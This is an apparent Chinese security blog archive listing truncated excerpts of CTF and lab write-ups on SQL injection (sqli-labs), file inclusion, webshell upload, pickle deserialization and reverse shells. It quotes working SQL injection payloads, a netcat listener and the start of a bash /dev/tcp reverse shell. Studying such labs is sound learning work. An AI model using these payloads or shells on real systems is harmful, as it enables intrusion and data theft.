09 2021 档案

摘要:两道web。 Babyhttp: 直接dirsearch,发现同时存在git和bak泄露;经验证,git的没用。 访问index.php.bak, 下载源码: 抓包,改包,发包即可。 get_or_lose: 一个绕过。还是花了不少时间的。 payload:?num=+03640 (因为正则过滤,h 阅读全文
posted @ 2021-09-27 19:22 hiddener 编辑
摘要:(无内鬼 今日不想学了 水一篇) nc nc nc easyoverflow Intoverflow 阅读全文
posted @ 2021-09-26 17:55 hiddener 编辑
摘要:(信安数基的quiz1写不出来 来这放题解泄愤) crypto类题。 题面 其加密的大致过程是,对明文flag中的逐个字符,随机使用三种加密方式: 第一种,对该字符进行sha256加密后以16进制形式输出。 第二种,将该字符转化为ascii码值,后进行指数运算+取模 加密。 第三种,依次有base3 阅读全文
posted @ 2021-09-25 11:37 hiddener 编辑
摘要:crypto类题。 题面如下: 前面的代码给出了原理;后面的字符串第一行是print出的key,第二行是密文。 加密原理是,首先对table进行乱序处理,然后将明文flag按照(顺序table-->乱序key)的映射生成密文cipher。 以下是具体的python代码审计: list() 用于将元组 阅读全文
posted @ 2021-09-24 14:29 hiddener 编辑
摘要:web类题。 访问题给页面,页面里没啥信息。抓包,发现: 访问它,发现是一个游戏。 F12之后看调试器里的js代码,发现: console.log("balabalabala"); 在控制台输出信息。 那一串由 ()!+[] 六个字符组成的编码是一种特定的javascript语法; 将其复制到本地j 阅读全文
posted @ 2021-09-23 18:07 hiddener 编辑
摘要:吸取了长城杯的教训,学习python-web迫在眉睫。 正常难度的python_template_injection,由于现在没学面向对象,理解原理比较困难,所以先使用简单版复现;并附上正常版的常用payload。 part1:操作 服务端代码: 测试payload1: 效果: 网页回显无意义。 测 阅读全文
posted @ 2021-09-23 10:44 hiddener 编辑
摘要:***本篇中的测试均需要使用python3完成。 攻击以下面脚本运作的服务器。 针对脚本的代码逻辑,写出生成利用任意代码执行漏洞的恶意序列的脚本: 打开攻击机端口, 将生成的东西输入网页cookie: 与在“反弹shell”中持续的控制权不同,这里只获得了短暂的远程控制效果: 在复现过程中,若出现错 阅读全文
posted @ 2021-09-20 21:23 hiddener 编辑
摘要:以这个服务端代码为例,简单了解一下flask的运用。 1。app = Flask(__name__)记住就好了 2。@app.route("/")记住就好了;注意括号里的是调用这个脚本的url路径; **这行代码得写在所有class、def的下方;起index效果的那个除外。 3。request.c 阅读全文
posted @ 2021-09-20 20:44 hiddener 编辑
摘要:part1:不求甚解的复现 对于服务端源码: 编写恶意序列化对象生成程序: 将生成的恶意序列化对象输入服务端user,使其执行系统命令。(上面那俩其实都行) part2:原理解释 b'xxx'是python的byte数据类型,一个字符只占一个字节;往往用【\x4A】这种形式表示,但如果是可见字符,也 阅读全文
posted @ 2021-09-20 13:44 hiddener 编辑
摘要:part1:不求甚解的本地复现 攻击端Debian 10.x: 192.168.208.134 受害端Ubuntu : 192.168.208.135 攻击端打开(监听)某端口: 键入命令:【nc -lvp 8080】 受害端执行反弹shell: 键入命令:【bash -i >& /dev/tcp/ 阅读全文
posted @ 2021-09-19 17:29 hiddener 编辑
摘要:靶子代码: 前端效果: 这是个没有任何防护的文件上传代码,同时还热心的附上了上传文件的路径。 我们写好php木马后,什么额外工作也不需要做,直接上传就行了。上传后在浏览器里访问该文件,其就会被执行。 注意,该文件扩展名必须为.php,否则浏览器访问时不会得到执行。 上传的同时,抓包,看下包的内容。 阅读全文
posted @ 2021-09-16 21:09 hiddener 编辑
摘要:PHP文件包含漏洞花样繁多,需配合代码审计。 看能否使用这类漏洞时,主要看: (1)代码中是否有include(),且参数可控; 如: (2)php.ini设置:确保 allow_url_fopen=1, allow_url_include=1; 确定了使用的参数之后,就可以开始用伪协议了。 1. 阅读全文
posted @ 2021-09-16 17:23 hiddener 编辑
摘要:布尔盲注适用于任何情况回显都不变的情况。 (由此,可以看出,回显啥的其实都不重要,最重要的是判断注入点。只要找到注入点了,其他的都是浮云。) 在操作上,时间盲注还稍微简单一点;它不需要像布尔盲注那样,我们还需要去比对各种回显,找判断条件。 顶多是,post的时候,去burp里对一下参数就行了。 布尔 阅读全文
posted @ 2021-09-15 22:35 hiddener 编辑
摘要:终于写到非get类型的注入了。 不过,我懒得在这里搞代码审计了;留到存储型XSS原型的时候再来分析源码吧。 这次以Less-15为例。 框里随便输点东西,submit,抓包,发现包出现了一些改变: 同时,发现注入 (这里必须用#; --+不行) 再试,发现了三种回显:什么都不输入的无配图,登入失败的 阅读全文
posted @ 2021-09-15 21:24 hiddener 编辑
摘要:现在,我们回到之前,练习脚本支持的布尔盲注(get型)。 布尔盲注的应用场景是查询成功和失败时回显不同,且存在注入点的地方。 这里以Less-8为例: 发现查询成功时,会显示;失败则无回显。 同时发现,payload: ?id=0' or 1=1 --+ 可以查询成功;即此处存在注入点,or可以得到 阅读全文
posted @ 2021-09-15 19:52 hiddener 编辑
摘要:系统的http状态码知识,我是在《图解http里学习的》。 状态码的职责是告知从服务器端返回的请求结果。 分类如下: 2XX --> 成功 200 OK(一般情况) 204 No Content(无实体) 206 Partial Content(部分实体) 3XX --> 重定向 301 Moved 阅读全文
posted @ 2021-09-15 00:00 hiddener 编辑
摘要:首先申明,Less-(38~41)可以采取和Less-(1~4)相同的解法;(一一对应) 然而,他们的漏洞其实更大,我们可以做更多具有破坏性的事情。 代码审计: Less-(38~41): 41的$sql同39,但没有报错回显了。 mysqli_multi_query() 执行一个或多个针对数据库的 阅读全文
posted @ 2021-09-13 22:06 hiddener 编辑
摘要:Less-33: 各种回显均存在。 本关过滤字符的方式发生了改变。 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是: 单引号(') 双引号(") 反斜杠(\) NULL Less-35: 只是把单引号去掉了,其余关于Less-33都不变。 Less-36: 对于 阅读全文
posted @ 2021-09-13 20:07 hiddener 编辑
摘要:<!-- 下午整了半天Less-29~31,愣是没调好jsp环境,只好跳过。 难受.jpg !--> Less-32: 核心语句: 各种回显均存在。 第一句话指定了字符集为gbk。 chech_addslaches 函数是个很强的过滤: 在第二行和第三行, 它通过在前面加一个反斜杠将其转义的方式,屏 阅读全文
posted @ 2021-09-13 19:01 hiddener 编辑
摘要:Less-26: 核心语句: 各种回显均存在。 本题相比Less-25,多屏蔽了很多符号; 首先是各种注释符 --+,#,/**/ 。 /[]/表示字符集合;任何出现在里面的字符均会被替换。 屏蔽{ / * \ }等比较特殊的字符时,需要加上转义符号。 /s 不是转义 而是匹配任何空白字符,包括空格 阅读全文
posted @ 2021-09-12 19:28 hiddener 编辑
摘要:Less-25: 核心语句: 各种回显也均有。 通过blacklist,我们可以发现,本题屏蔽了and和or。 preg_replace函数中正则表达式后面的i是一个修饰符,代表正则匹配时不区分大小写。 我们也发现,该函数未进行重复替换。所以,我们可以用 oorr 代替语句里含 or 的部分; 用a 阅读全文
posted @ 2021-09-12 17:49 hiddener 编辑
摘要:Less-23: 直接跳到Less-23的原因是,Less-(11~22)均为注入点不为get方式的注入。我先把get型注入写的差不多,再回来整理关于注入点的内容。 核心语句: 查询、报错均有回显。 本题$sql及后面部分都与Less-1无异。然而,前面多了一些部分,起了过滤的作用。 要了解这些过滤 阅读全文
posted @ 2021-09-11 23:12 hiddener 编辑
摘要:在Less-8中,我们发现: 即,出错时,网页不再回显错误信息。但此时,出错和未出错的页面还是有区别的,可以使用布尔盲注。 在Less-9、10中,两页面无任何区别了,只能使用时间盲注。 这两种盲注都比较复杂,自己硬注的话也需要一些辅助工具,故不在此处赘述,使用sqlmap即可。 关于sqlmap的 阅读全文
posted @ 2021-09-11 18:02 hiddener 编辑
摘要:Less-5: 核心语句: 我们注意到,当输入正确时,并不能获得有价值的回显。好在出现错误时,会爆出错误内容: 于是,使用报错注入: 1' and updatexml(1,concat(0x7e,(select(database()))),1) --+ 此时,我们的语句实际上已经变成and连接的两个 阅读全文
posted @ 2021-09-11 17:39 hiddener 编辑
摘要:Less-1: 核心语句: 无任何防护;回显查询结果或错误内容。 输入单引号闭合语句中的单引号,#注释后面的内容,即可注入。由于有查询结果回显,直接联合注入即可。 1'order by x #(有些环境下#天然不行,需要使用--+或--空格) 探测查询的列数;union select要求前后查询列数 阅读全文
posted @ 2021-09-11 17:13 hiddener 编辑
摘要:在开始练习之前,我们以Less-1为例对php代码进行审计。这样,在后续关卡,我们大多数时间只需要关注其与Less-1不相同的地方即可。 sqli-lab-PHP7-master的程序均采用面向过程的书写方式编写,对有C基础的人来说较易上手。 index.php: 第一行是一个使用相对路径的文件包含 阅读全文
posted @ 2021-09-11 15:26 hiddener 编辑
摘要:sql-lab练习,可以在刷题平台上进行,比如buuoj(https://buuoj.cn/challenges#sqli-labs) 产生搭建本地环境的想法,主要是因为这样可以一边学习代码审计一边学习SQL注入,感觉起来对新手比较友好(其实是暑假的时候不知道在哪找靶场) 本地环境搭建采用WAMP( 阅读全文
posted @ 2021-09-11 14:46 hiddener 编辑
摘要:总结1(2021.8.11) 1、普通联合查询 样例payload: Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=databas 阅读全文
posted @ 2021-09-11 11:36 hiddener 编辑
摘要:Web新手区 F12或者直接抓包 dirsearch直接扫,然后访问robots.txt; 访问直接在网址后面输/,再输想访问的地方就行了。 robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存 阅读全文
posted @ 2021-09-11 11:36 hiddener 编辑
摘要:今天各种场合都有使用各种 Linux 发行版,从嵌入式设备到超级计算机,并且在服务器领域确定了地位,通常服务器使用 LAMP(Linux + Apache + MySQL + PHP)或 LNMP(Linux + Nginx+ MySQL + PHP)组合。 一、Linux系统目录结构: /bin: 阅读全文
posted @ 2021-09-11 11:36 hiddener 编辑

点击右上角即可分享
微信分享提示